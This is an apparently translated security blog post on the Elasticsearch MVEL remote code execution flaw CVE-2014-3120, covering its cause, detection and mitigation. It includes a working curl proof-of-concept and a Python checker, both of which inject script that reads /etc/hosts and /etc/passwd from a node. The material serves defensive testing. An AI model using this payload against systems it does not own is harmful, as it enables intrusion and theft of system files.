  • Analysis of the ElasticSearch Remote Arbitrary Code Execution Vulnerability (CVE-2014-3120)

    How it works

    The vulnerability is actually very simple. ElasticSearch has a scripting feature that makes it convenient to post-process the data returned by a query.

    The scripting engine ElasticSearch uses is MVEL. MVEL has no protection or sandboxing of any kind, so a script can call into the JVM freely and execute arbitrary code.

    On top of that, ElasticSearch (versions before 1.2) enables dynamic scripting by default, so anyone who can reach the HTTP API can execute arbitrary code on the node simply by sending a search request.

    The vendor was in fact aware of this; the documentation says:

    First, you should not run Elasticsearch as the root user, as this would allow a script to access or do anything on your server, without limitations. Second, you should not expose Elasticsearch directly to users, but instead have a proxy application in between.


    Detection

    Online checks:

    http://tool.scanv.com/es.html          can check any address

    http://bouk.co/blog/elasticsearch-rce/poc.html   only checks localhost, but prints the contents of /etc/hosts and /etc/passwd to the page

    Manual check:

    curl -XPOST 'http://localhost:9200/_search?pretty' -d '
    {
        "size": 1,
        "query": { "filtered": { "query": { "match_all": {} } } },
        "script_fields": {
            "/etc/hosts":  { "script": "import java.util.*; import java.io.*; new Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();" },
            "/etc/passwd": { "script": "import java.util.*; import java.io.*; new Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();" }
        }
    }'

    The double quotes inside each script must be escaped as \" (and the \Z regex delimiter written as \\\\Z) because the script is itself a JSON string. On a vulnerable node the response carries the two files under "fields" in the first hit. Note that script fields are only evaluated for documents that are returned, so the node must hold at least one document; against an empty cluster the request returns no hits and says nothing about whether scripting is enabled.
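The same check as a small Python script is added here as an example; it is not code from the original post or from Elasticsearch. It builds the script_fields query above, sends it to a node, and classifies the reply, including the empty-cluster case the curl command cannot distinguish. The host and port are assumptions, the sample replies are constructed rather than captured from a real node, and matching the substring "dynamic scripting" to recognise a node that refuses the script is an assumption about the error message of 1.2 and later.

```python
"""Added example (not from the original post or from Elasticsearch): a
small CVE-2014-3120 checker that builds the same script_fields query as
the curl command above, sends it to one node, and classifies the reply.
Standard library only.  The sample replies below are constructed, and the
'dynamic scripting' substring used to recognise a patched node is an
assumption about the 1.2+ error message."""
import json
import urllib.error
import urllib.request

# MVEL snippet that reads a file, same technique as the PoC above.  The
# doubled backslash survives json.dumps as \\\\Z, which MVEL reads as \Z.
MVEL_READ = ('import java.util.*; import java.io.*; '
             'new Scanner(new File("{path}")).useDelimiter("\\\\Z").next();')


def build_poc_body(paths=("/etc/hosts", "/etc/passwd")):
    """JSON body of the _search request: one script_field per path."""
    return {
        "size": 1,
        "query": {"filtered": {"query": {"match_all": {}}}},
        "script_fields": {p: {"script": MVEL_READ.format(path=p)} for p in paths},
    }


def classify(status, body):
    """Classify a node's reply to the PoC.

    'vulnerable' : a hit came back carrying the file contents
    'disabled'   : the node refused the dynamic script (1.2+ default, or
                   script.disable_dynamic: true)
    'no-data'    : no documents, so the script never ran; inconclusive
    'unknown'    : not JSON, some other error, or not ElasticSearch at all
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return "unknown"
    if status != 200 or "error" in doc:
        msg = str(doc.get("error", "")).lower()
        return "disabled" if "dynamic scripting" in msg else "unknown"
    hits = doc.get("hits", {}).get("hits", [])
    if not hits:
        return "no-data"
    for value in hits[0].get("fields", {}).values():
        # 1.x wraps script_field values in a list; older builds return scalars.
        values = value if isinstance(value, list) else [value]
        if any(isinstance(v, str) and v.strip() for v in values):
            return "vulnerable"
    return "unknown"


def probe(host="localhost", port=9200, timeout=5):
    """Send the PoC to one node and classify it (network call; host and port
    are assumptions, change them for the node you are testing)."""
    req = urllib.request.Request(
        "http://%s:%d/_search?pretty" % (host, port),
        data=json.dumps(build_poc_body()).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode())
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read().decode())


# Constructed replies (not captured from a real node) for offline use.
SAMPLE_VULNERABLE = json.dumps({"hits": {"total": 1, "hits": [{
    "_index": "test", "fields": {
        "/etc/hosts": ["127.0.0.1 localhost\n"],
        "/etc/passwd": ["root:x:0:0:root:/root:/bin/bash\n"]}}]}})
SAMPLE_DISABLED = json.dumps({
    "error": "SearchPhaseExecutionException[...; "
             "ElasticsearchIllegalArgumentException[dynamic scripting disabled]]",
    "status": 500})
SAMPLE_EMPTY = json.dumps({"hits": {"total": 0, "hits": []}})

if __name__ == "__main__":
    for name, status, body in (("vulnerable node", 200, SAMPLE_VULNERABLE),
                               ("patched node", 500, SAMPLE_DISABLED),
                               ("empty cluster", 200, SAMPLE_EMPTY)):
        print("%-16s -> %s" % (name, classify(status, body)))
    # print(probe("localhost"))  # live check against a node you own
```

Letting json.dumps build the body avoids the hand escaping the curl version needs, and the "no-data" outcome is the one to watch for: a scanner that reports "not vulnerable" on an empty cluster is simply wrong, and the usual remedy is to index a throwaway document first and rerun the query.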

    Mitigation

    Turn off dynamic script execution by adding the following line to elasticsearch.yml on every node (a restart is required for the setting to take effect):

    script.disable_dynamic: true

    http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts

    The vendor disables dynamic scripting by default starting with version 1.2.

    https://github.com/elasticsearch/elasticsearch/issues/5853

    References:

    http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

    http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/search-request-script-fields.html

    http://bouk.co/blog/elasticsearch-rce/

  • Original URL: https://www.cnblogs.com/jzssuanfa/p/6803338.html